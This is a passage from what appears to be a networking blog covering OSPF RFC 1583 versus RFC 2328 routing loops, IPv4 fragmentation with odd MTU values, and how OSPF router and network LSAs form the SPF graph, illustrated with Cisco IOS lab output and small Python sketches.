      Route metric is 3, traffic share count is 1

Clearly it has changed its mind regarding the best path towards 6.6.6.6/32, flipping from ASBR1 to ASBR2. You can probably already guess what ABR2 has in mind:

ABR2#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 13
  Last update from 192.168.13.1 on FastEthernet0/1, 00:17:24 ago
  Routing Descriptor Blocks:
  * 192.168.13.1, from 4.4.4.4, 00:17:24 ago, via FastEthernet0/1
      Route metric is 1, traffic share count is 1
      Route tag 6
ABR2#
ABR2#show ip os database external | include Link State ID|Netowrk Mask|Metric|Forward
  Link State ID: 6.6.6.6 (External Network Number )
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.1.46.6
  Link State ID: 6.6.6.6 (External Network Number )
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.2.56.6
ABR2#
ABR2#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
  Known via "ospf 1", distance 110, metric 13, type inter area
  Last update from 192.168.13.1 on FastEthernet0/1, 00:27:01 ago
  Routing Descriptor Blocks:
  * 192.168.13.1, from 2.2.2.2, 00:27:01 ago, via FastEthernet0/1
      Route metric is 13, traffic share count is 1
ABR2#                       
ABR2#show ip route 10.2.56.6                                                         
Routing entry for 10.2.56.0/24
  Known via "ospf 1", distance 110, metric 1001, type intra area
  Last update from 192.168.35.5 on FastEthernet0/0, 00:18:04 ago
  Routing Descriptor Blocks:
  * 192.168.35.5, from 5.5.5.5, 00:18:04 ago, via FastEthernet0/0
      Route metric is 1001, traffic share count is 1

ABR2 compares its costs towards both Forwarding Addresses (13 via R1 versus 1001 via ASBR2) and decides to forward traffic to ASBR1 via R1, hence the loop. Now let’s turn on RFC 2328 compliance on ABR2: it will advertise the worst metric among the aggregated subnets, so the path towards the Forwarding Address can only become better as a packet crosses the ABR, not the other way around.

ABR2(config)#router ospf 1
ABR2(config-router)#no compatible rfc1583

And – poof! – R1 can select an appropriate path once again:

R1#ping 6.6.6.6 source loopback 0                                                    
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/28/40 ms
R1#
R1#show ip route 6.6.6.6         
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 12
  Last update from 192.168.12.2 on FastEthernet0/0, 00:01:10 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 4.4.4.4, 00:01:10 ago, via FastEthernet0/0
      Route metric is 1, traffic share count is 1
      Route tag 6
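
The flip can be reproduced with a few lines of Python. This is only a sketch under stated assumptions: the function names are invented, the cost of 2 towards 10.2.2.2/32 on ABR2 is inferred from R1’s metric of 3 for 10.2.0.0/16 minus an assumed R1-ABR2 link cost of 1, and the other numbers are taken from the outputs above.

```python
def range_cost(component_costs, rfc1583_compatible):
    """Cost an ABR advertises in the Type 3 LSA for an aggregated range."""
    costs = component_costs.values()
    # RFC 1583: smallest component cost; RFC 2328: largest component cost.
    return min(costs) if rfc1583_compatible else max(costs)


# ABR2's own cost towards each component of 10.2.0.0/16.
ABR2_COMPONENTS = {
    "10.2.56.0/24": 1001,  # from "show ip route 10.2.56.6" on ABR2
    "10.2.2.2/32": 2,      # assumption: inferred, not shown in the outputs
}
R1_TO_ABR2 = 1       # assumption: default cost of the R1-ABR2 link
COST_VIA_ABR1 = 12   # R1's metric for 10.1.0.0/16


def r1_forwarding_address(rfc1583_compatible):
    """Forwarding Address that R1 prefers for 6.6.6.6/32."""
    via_abr2 = R1_TO_ABR2 + range_cost(ABR2_COMPONENTS, rfc1583_compatible)
    return "10.2.56.6" if via_abr2 < COST_VIA_ABR1 else "10.1.46.6"


print("RFC 1583 mode on ABR2:", r1_forwarding_address(True))
print("RFC 2328 mode on ABR2:", r1_forwarding_address(False))
```

In RFC 1583 mode the range is advertised with the cost of the new loopback, so R1 sees 3 and prefers 10.2.56.6; in RFC 2328 mode the range carries 1001, R1 sees 1002 and falls back to 10.1.46.6 with a forward metric of 12.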

The creepy part is that RFC 1583 compatible behaviour has been widely deployed since the inception of the standard, including Cisco IOS, Juniper Junos and Huawei VRP. Obviously, this is done for the sake of backwards compatibility, while other products implement RFC 2328 by default (e.g. Arista EOS, Cisco NX-OS). Still, the ease of creating a loop with an innocent configuration is something to watch out for. The solution is rather simple though: either enable RFC 2328 or deploy OSPF in a KISS way: no virtual links, NSSA, FA or other CCIE-beloved stuff.

Kudos for review: Kuraleva Anastasiia


IP MTU: how to stop living and start learning headers

Good old IPv4… It is as ubiquitous in networking world as the air is on the Earth. Although folks around the world use it on a daily basis, IPv4 still has a few surprises up its sleeve. Today we’re going to peek at one of them.

Here is the topology of four routers lined up in a row:

Each router has basic addressing set up as well as EIGRP on all of the interfaces:
R2#show run | section router|interface FastEthernet
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
router eigrp 1
 network 0.0.0.0

By default, IP MTU on each link is equal to 1500. This means that the acceptable IP packet size, including headers and payload, can be up to 1500 bytes; if a packet is too big, it has to be fragmented. Suppose the MTU of R2-R3 link is equal to 1400 bytes on both ends:

R2#show run interface fastEthernet0/1

interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
 ip mtu 1400

How many fragments would a 1500-byte packet produce?

R1#ping 4.4.4.4 source 1.1.1.1 size 1500 repeat 1
Type escape sequence to abort.
Sending 1, 1500-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 68/68/68 ms

It’s pretty easy to deduce that a 1500-byte packet should result in 2 fragments for an MTU of 1400 bytes. However, why are there 2 fragments for the ICMP echo reply as well? Well, it turns out that ICMP is in fact supposed to work this way:

The data received in the echo message must be returned in the echo reply message.

RFC792

Let’s reduce the R2-R3 MTU down to 700 bytes on both ends and check whether we can squeeze exactly two fragments of 700 bytes through it. The IP header is 20 bytes long, so each fragment carries 680 bytes of payload and the initial packet should be 680*2 + 20 = 1380 bytes (IP MTU includes the header, remember?).

R1#ping 4.4.4.4 source 1.1.1.1 size 1380 repeat 1
Type escape sequence to abort.
Sending 1, 1380-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms

Now for the highlight of the testing: the magical MTU value of 725.

R1#ping 4.4.4.4 source 1.1.1.1 size 1430 repeat 1    
Type escape sequence to abort.
Sending 1, 1430-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms

Let’s break down the initial packet: a 20-byte header and 1410 bytes of payload that result… in 3 fragments? Shouldn’t 1410 bytes fit perfectly into two fragments with 705 bytes of allowed payload each?

Frankly speaking, 725 is as special as any other MTU whose fragment payload (MTU minus the 20-byte header) is not divisible by 8. The catch is the Fragment Offset field, which encodes the relative position of a fragment’s payload within the original data.

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Fragment offset is measured in units of 8 bytes. Since 705 is not divisible by 8, the router rounds it down to the nearest multiple of 8, which is 704 bytes.

The exact sizing of fragments is not dictated by the RFC. In this particular case R2 chooses to put 8 bytes into the 2nd fragment and leave the remaining 698 bytes for the last one.
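
The fragment counts from all three tests can be double-checked with a short Python sketch. It assumes a 20-byte header without options and a greedy split (fill every fragment as much as the MTU allows), which is only one of the valid strategies: R2 above distributes the same 1410 bytes as 704, 8 and 698. The function name is made up for illustration.

```python
IP_HEADER = 20  # bytes, assuming no IP options


def fragment(packet_size, mtu):
    """Return (fragment offset in 8-byte units, payload bytes) per fragment."""
    payload = packet_size - IP_HEADER
    if packet_size <= mtu:
        return [(0, payload)]
    # Every fragment except the last one must carry a multiple of 8 bytes,
    # because the Fragment Offset field counts 8-byte units.
    chunk = (mtu - IP_HEADER) // 8 * 8
    if chunk <= 0:
        raise ValueError("MTU is too small to carry any payload")
    fragments = []
    sent = 0
    while sent < payload:
        size = min(chunk, payload - sent)
        fragments.append((sent // 8, size))
        sent += size
    return fragments


for size, mtu in ((1500, 1400), (1380, 700), (1430, 725)):
    print(f"{size} bytes over MTU {mtu}: {fragment(size, mtu)}")
```

The last case yields three fragments because only 704 of the 705 available payload bytes can be used, so 2 bytes spill over into a third fragment.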

In the end, hosts try to avoid fragmentation altogether by various means: PMTUD and TCP MSS, to name a few. Such behaviour makes issues with unpredictable fragment sizes even less likely to occur in real life. However, sometimes one needs a reason to justify learning IP headers, eh?..

Kudos for review: Anastasiia Kuraleva


OSPF way: from LSA to graph

It’s not a secret that OSPF is a link-state routing protocol: it collects topology information, builds a graph and runs Dijkstra’s algorithm to determine the shortest path. Topology information is the data one would collect anyway to find the best path with a pen and a piece of paper: it includes nodes, their interfaces and subnets, as well as certain operational facts (e.g., flags). OSPF organizes this data into structures called LSAs (link-state advertisements). The SPF algorithm is also well known to the IT community: it can be found in almost any academic curriculum nowadays.

LSA roles are well described in various articles and notes: router LSA for nodes, network LSA for broadcast segment, summary LSA for inter-area information transfer… However, I find it relatively difficult to assemble all these pieces into a holistic puzzle called graph. I admit that RFC must hold the ultimate truth and thus the extensive description of the process, but this knowledge has evaded me for quite some time. This is the reason for this article: I’d like to share my understanding of LSA roles and how to build the graph out of LSDB.

The basis for this discussion is the following topology:

Figure 1. Network topology

This time I’m going to build the network almost from scratch, examining the effects caused by every significant configuration change. The preparation includes only addressing setup (R5 listed as an example):

R5(config)#interface Loopback0
R5(config-if)# ip address 5.5.5.5 255.255.255.255
R5(config)#interface FastEthernet0/1
R5(config-if)# ip address 192.168.45.5 255.255.255.0
R5(config-if)# no shutdown

LSA1: router LSA

In order to build a graph, one should decide which type of graph is going to be built. According to RFC 2328 section 2.1 OSPF operates with a directed graph: vertices for networks and routers, edges for connections between them. OSPF uses the cost of an output interface as an edge weight (section 2.1.2), thus the directed graph is also a weighted one.

Let’s start with a vertex for R1:

R1(config)#router ospf 1
R1#show ip ospf database

            OSPF Router with ID (1.1.1.1) (Process ID 1)

There is nothing in the LSDB yet, as IOS requires at least one active interface for the OSPF process to initialize. Although it makes sense, it doesn’t help us with graph construction. At this stage it would look like this:

Figure 2. LSA1, R1 added

Let’s make IOS happy and add 1.1.1.1/32 to the mix:

R1(config)#router ospf 1
R1(config-router)#router-id 1.1.1.1
R1(config-router)#network 1.1.1.1 0.0.0.0 area 0
R1#
R1#show ip ospf database

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         21          0x80000001 0x00D055 1

We’ve got ourselves the first LSA1. Before looking at its contents, we shall peek at the format first:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |       1       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |    0    |V|E|B|        0      |            # links            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                          Link ID                              |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Link Data                             |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |     Type      |     # TOS     |            metric             |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |      TOS      |        0      |          TOS  metric          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                          Link ID                              |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Link Data                             |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

The header of LSA1 allows building a vertex for a router, using Link State ID (or Advertising Router) field. The rest of LSA1 (omitting options and flags) is dedicated to networks (vertices) and links (edges). There are 4 types of links available:

  1. point-to-point;
  2. transit;
  3. stub;
  4. virtual.

Let’s see which type of link we have so far:

R1#show ip ospf database router 1.1.1.1

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

  LS age: 55
  Options: (No TOS-capability, DC)
  LS Type: Router Links
  Link State ID: 1.1.1.1
  Advertising Router: 1.1.1.1
  LS Seq Number: 80000001
  Checksum: 0xD055
  Length: 36
  Number of Links: 1

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 1.1.1.1
     (Link Data) Network Mask: 255.255.255.255
      Number of MTID metrics: 0
       TOS 0 Metrics: 1
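
The reported length of 36 bytes follows directly from the format: a 20-byte header, 4 bytes of flags and link count, and 12 bytes per link. As a cross-check, here is a hedged Python sketch that packs the fields from the output above into bytes and decodes them back. The function name is hypothetical, the options byte 0x22 is an assumption (the output only says “No TOS-capability, DC”), and the link type codes 1 to 4 follow the order of the list above as defined in RFC 2328.

```python
import struct
from ipaddress import IPv4Address

LINK_TYPES = {1: "point-to-point", 2: "transit", 3: "stub", 4: "virtual"}


def parse_router_lsa(data):
    """Decode the 20-byte LSA header and the router-LSA links."""
    (age, options, ls_type, lsid, adv_router,
     seq, checksum, length) = struct.unpack_from("!HBB4s4sIHH", data, 0)
    flags, _, link_count = struct.unpack_from("!BBH", data, 20)
    links = []
    offset = 24
    for _ in range(link_count):
        link_id, link_data, link_type, tos_count, metric = struct.unpack_from(
            "!4s4sBBH", data, offset)
        links.append((LINK_TYPES[link_type], str(IPv4Address(link_id)),
                      str(IPv4Address(link_data)), metric))
        # Skip the optional per-TOS metrics (4 bytes each); they are not decoded.
        offset += 12 + 4 * tos_count
    return {"lsid": str(IPv4Address(lsid)),
            "adv_router": str(IPv4Address(adv_router)),
            "seq": seq, "length": length, "links": links}


r1 = IPv4Address("1.1.1.1").packed
mask = IPv4Address("255.255.255.255").packed
# Header: age 55, options 0x22 (assumed), type 1, LSID, ADV router, seq, checksum, length.
sample = struct.pack("!HBB4s4sIHH", 55, 0x22, 1, r1, r1, 0x80000001, 0xD055, 36)
sample += struct.pack("!BBH", 0, 0, 1)             # no V/E/B flags, one link
sample += struct.pack("!4s4sBBH", r1, mask, 3, 0, 1)  # stub link, metric 1

lsa = parse_router_lsa(sample)
print(len(sample), lsa)
```

The sample is built by hand rather than captured from the wire, so it demonstrates the layout only, not the exact bytes R1 floods.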

The 1.1.1.1/32 network is a stub link, the kind of network where end devices usually reside. Such an entity is designed to be a leaf node of the graph, thus no OSPF routers are expected in such a subnet. A stub link is represented by a vertex with a single edge for each direction, connecting it to a router node.

Figure 3. LSA1, stub network added

This link type has all the necessary information for its part of the graph: network, mask and egress cost (ingress cost is always zero). The adjacent router can be derived from the LSA1 header (LSID); however, nothing prevents the same network vertex from being anchored to several router nodes, which is what enables ECMP.

The next link type is point-to-point network: it describes a connection to another router. Let’s enable OSPF on R2 and establish adjacency over R1-R2 link using P2P link:

R1(config)#interface f0/1
R1(config-if)#ip ospf network point-to-point
R1(config-if)#ip ospf 1 area 0
R2(config)#router ospf 1
R2(config-router)#router-id 2.2.2.2
R2(config)#interface f0/1
R2(config-if)#ip ospf network point-to-point
R2(config-if)#ip ospf 1 area 0
R1#show ip ospf database

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         41          0x8000001D 0x00B441 3
2.2.2.2         2.2.2.2         42          0x80000001 0x0055CC 2

As expected, a new LSA1, corresponding to R2, is created. However, notice the “odd” link count: OSPF was enabled on a single interface per router, yet R1’s link count grew from 1 to 3 and R2’s brand new LSA already lists 2 links.

R1#show ip ospf database router 1.1.1.1

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

  LS age: 283
  Options: (No TOS-capability, DC)
  LS Type: Router Links
  Link State ID: 1.1.1.1
  Advertising Router: 1.1.1.1
  LS Seq Number: 8000001D
  Checksum: 0xB441
  Length: 60
  Number of Links: 3

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 1.1.1.1
     (Link Data) Network Mask: 255.255.255.255
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: another Router (point-to-point)
     (Link ID) Neighboring Router ID: 2.2.2.2
     (Link Data) Router Interface address: 192.168.12.1
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 192.168.12.0
     (Link Data) Network Mask: 255.255.255.0
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

A single interface with an IP network assigned creates 2 entities: a stub network (it’s an addressable subnet after all) and a point-to-point link corresponding to a graph edge between router vertices. An adjacent router node is referenced by Link ID (the neighbor’s RID, which is also the LSID of its LSA1) so that the edge for bidirectional connectivity between nodes can be correctly described with a pair of LSA1. Two-way adjacency is crucial for the edge between router vertices, although the cost for each direction might differ. Next-hop for IP forwarding is also readily available from link data for point-to-point connections.

Since the costs of the links are left by default and thus are equal, the following graph is formed:

Figure 4. LSA1, point-to-point link added
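To make the mapping from LSA1 links to graph edges more tangible, here is a minimal Python sketch. The `Link` class and the helper names are made up for illustration, and R2's links are assumed to mirror R1's (at this point only R2's link count of 2 is visible in the output).

```python
from dataclasses import dataclass

# Link types found in a router LSA (labels are illustrative).
P2P, STUB = "p2p", "stub"

@dataclass(frozen=True)
class Link:
    kind: str     # P2P or STUB
    link_id: str  # neighbor RID (P2P) or network number (STUB)
    data: str     # local interface address (P2P) or network mask (STUB)
    cost: int

# LSDB keyed by LSID of each LSA1. R1 is transcribed from the output above;
# R2's entries are an assumption that mirrors R1's side of the link.
lsdb = {
    "1.1.1.1": [
        Link(STUB, "1.1.1.1", "255.255.255.255", 1),
        Link(P2P, "2.2.2.2", "192.168.12.1", 1),
        Link(STUB, "192.168.12.0", "255.255.255.0", 1),
    ],
    "2.2.2.2": [
        Link(P2P, "1.1.1.1", "192.168.12.2", 1),
        Link(STUB, "192.168.12.0", "255.255.255.0", 1),
    ],
}

def router_edges(lsdb):
    """Directed router-to-router edges that pass the two-way check."""
    edges = {}
    for rid, links in lsdb.items():
        for link in links:
            if link.kind != P2P:
                continue
            # The neighbor's LSA1 must list a P2P link pointing back at us.
            back = any(l.kind == P2P and l.link_id == rid
                       for l in lsdb.get(link.link_id, []))
            if back:
                edges[(rid, link.link_id)] = link.cost
    return edges

def stub_edges(lsdb):
    """Router-to-network edges; the same network may hang off several routers."""
    return {(rid, f"{l.link_id}/{l.data}"): l.cost
            for rid, links in lsdb.items() for l in links if l.kind == STUB}

print(router_edges(lsdb))
print(stub_edges(lsdb))
```

Note that 192.168.12.0 shows up twice in the stub edges, once per router, which is exactly the "same network vertex anchored to different router nodes" case.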

Virtual link is out of scope of this article since it’s considered an ad-hoc crutch for extinguishing immediate fires rather than a permanent solution within proper design. However, it’s still a curious entity starting from OSPFv2, so if you’re eager to spend some time with it, there is a relevant article by Petr Lapukhov.

There is only one link type left: transit link (don’t confuse it with transit capability!).

LSA2: network LSA

Point-to-point connections are able to describe direct links between routers; however, there could be L2 segments that might be either broadcast-capable (e.g., Ethernet) or NBMA (e.g., DMVPN). The latter type usually employs a bundle of logical point-to-point adjacencies since the logical topology is hub-and-spoke, so these connections are easily modelled in OSPF already.

Broadcast medium, however, poses a scalability inefficiency and thus requires a different approach. Consider the Ethernet segment between R2, R3 and R4. Obviously, it is impossible to have an edge that connects more than 2 nodes. Although routers could establish direct adjacencies, it would not scale very well because the number of connections would grow as O(n²) resulting in higher CPU and RAM usage.

The optimization idea is simple: introduce a single pseudo-node that every router in L2 segment would connect to. Such an approach reduces the number of active adjacencies from O(n²) to O(n), increasing scalability in the end. The router, responsible for maintaining pseudo-node, is called a designated router (DR); the vertex that corresponds to a pseudo-node is described by LSA2; the edge towards a pseudo-node is defined by transit link in LSA1 and contents of LSA2.
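A quick back-of-the-envelope check of the scaling claim, as a small Python sketch (function names are illustrative). The last helper assumes a segment that also elects a backup DR, which roughly doubles the count but keeps it linear.

```python
def full_mesh_adjacencies(n: int) -> int:
    """Every router adjacent to every other router: n(n-1)/2."""
    return n * (n - 1) // 2

def dr_only_adjacencies(n: int) -> int:
    """Every non-DR router adjacent to the DR only: n-1."""
    return max(n - 1, 0)

def dr_bdr_adjacencies(n: int) -> int:
    """Every other router adjacent to both DR and BDR, plus DR-BDR: 2n-3."""
    if n < 2:
        return 0
    if n == 2:
        return 1
    return 2 * (n - 2) + 1

for n in (3, 10, 50):
    print(n, full_mesh_adjacencies(n), dr_only_adjacencies(n), dr_bdr_adjacencies(n))
```

For the three-router segment in this lab the difference is negligible, but at 50 routers it is 1225 adjacencies against 97.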

Let’s enable OSPF on R2, R3 and R4, leaving the OSPF network type as is (broadcast by default):

R2(config)#interface f0/0
R2(config-if)#ip ospf 1 area 0
R3(config)#router ospf 1
R3(config-router)#router-id 3.3.3.3
R3(config)#interface f0/0
R3(config-if)#ip ospf 1 area 0
R4(config)#router ospf 1
R4(config-router)#router-id 4.4.4.4
R4(config)#interface f0/0
R4(config-if)#ip ospf 1 area 0
R2#show ip ospf neighbor

Neighbor ID     Pri   State           Dead Time   Address         Interface
3.3.3.3           1   FULL/BDR        00:00:38    192.168.234.3   FastEthernet0/0
4.4.4.4           1   FULL/DR         00:00:35    192.168.234.4   FastEthernet0/0
1.1.1.1           0   FULL/  -        00:00:35    192.168.12.1    FastEthernet0/1
R2#
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         538         0x80000022 0x00AA46 3
2.2.2.2         2.2.2.2         116         0x80000008 0x005804 3
3.3.3.3         3.3.3.3         118         0x80000002 0x004228 1
4.4.4.4         4.4.4.4         117         0x80000002 0x00045D 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         117         0x80000001 0x00F0B8

As we can see, LSA2 is indeed issued by R4 (4.4.4.4) who is currently a DR. The simplified election process is straightforward:

  1. build a list of routers participating in the election (non-zero priority);
  2. select highest priority;
  3. select highest RID.

Backup DR (BDR) is elected in the same way as DR with a subtle difference: elected DR cannot be preempted while BDR can. Since DR is responsible for the pseudo-node, this router synchronizes the LSDB with every node in a segment, reaching FULL state of adjacency. BDR behaves the same as DR except that it does not generate LSA2; its purpose is to minimize the disruption caused by DR failure.
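The simplified election above can be sketched in a few lines of Python. This is an illustration only: it assumes all routers come up at the same time and ignores non-preemption and the wait timer, and the function names are hypothetical.

```python
from ipaddress import IPv4Address

def elect(candidates):
    """Return the RID with the highest (priority, RID) among non-zero priorities."""
    eligible = [(prio, IPv4Address(rid))
                for rid, prio in candidates.items() if prio > 0]
    if not eligible:
        return None
    return str(max(eligible)[1])

def elect_dr_bdr(routers):
    """Pick DR first, then run the same selection among the rest for BDR."""
    dr = elect(routers)
    rest = {rid: prio for rid, prio in routers.items() if rid != dr}
    return dr, elect(rest)

# RID -> priority for the segment in this lab (default priority 1 everywhere).
segment = {"2.2.2.2": 1, "3.3.3.3": 1, "4.4.4.4": 1}
print(elect_dr_bdr(segment))
```

With the lab values this yields 4.4.4.4 as DR and 3.3.3.3 as BDR, in line with the neighbor table on R2. RIDs are compared as IPv4 addresses rather than strings, otherwise "10.0.0.1" would lose to "9.9.9.9".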

Let’s take a look at LSA1 first:

R2#show ip ospf database router 2.2.2.2

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

  LS age: 425
  Options: (No TOS-capability, DC)
  LS Type: Router Links
  Link State ID: 2.2.2.2
  Advertising Router: 2.2.2.2
  LS Seq Number: 8000000F
  Checksum: 0x4A0B
  Length: 60
  Number of Links: 3

    Link connected to: a Transit Network
     (Link ID) Designated Router address: 192.168.234.4
     (Link Data) Router Interface address: 192.168.234.2
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: another Router (point-to-point)
     (Link ID) Neighboring Router ID: 1.1.1.1
     (Link Data) Router Interface address: 192.168.12.2
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 192.168.12.0
     (Link Data) Network Mask: 255.255.255.0
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

At last, we meet the transit link. As you might have guessed, DR ID corresponds to LSA2 LSID and is equal to DR IP address. As with point-to-point links, next-hop IP address and cost are also present in this data structure. However, the LSA1 still does not fully describe the two-way connectivity as there is only a half of information required for building an edge. Besides, IP addressing for L2 segment is missing. Let’s peek at LSA2 format:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |      Options  |      2        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Attached Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

LSA2 should contain the missing pieces of the puzzle: a list of connected RIDs and the network mask.

R2#show ip ospf database network

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Net Link States (Area 0)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 459
  Options: (No TOS-capability, DC)
  LS Type: Network Links
  Link State ID: 192.168.234.4 (address of Designated Router)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000002
  Checksum: 0xEEB9
  Length: 36
  Network Mask: /24
        Attached Router: 4.4.4.4
        Attached Router: 2.2.2.2
        Attached Router: 3.3.3.3

Now we have all the information needed to extend the graph using transit segment:

Figure 5. LSA2 added

A few things are worth mentioning here. First, the egress cost from the pseudo-node is zero, so it does not introduce any penalty to path calculation. Second, subnet information is embedded in LSA2: the mask is listed explicitly and the network itself can be derived using LSID and the prefix length.
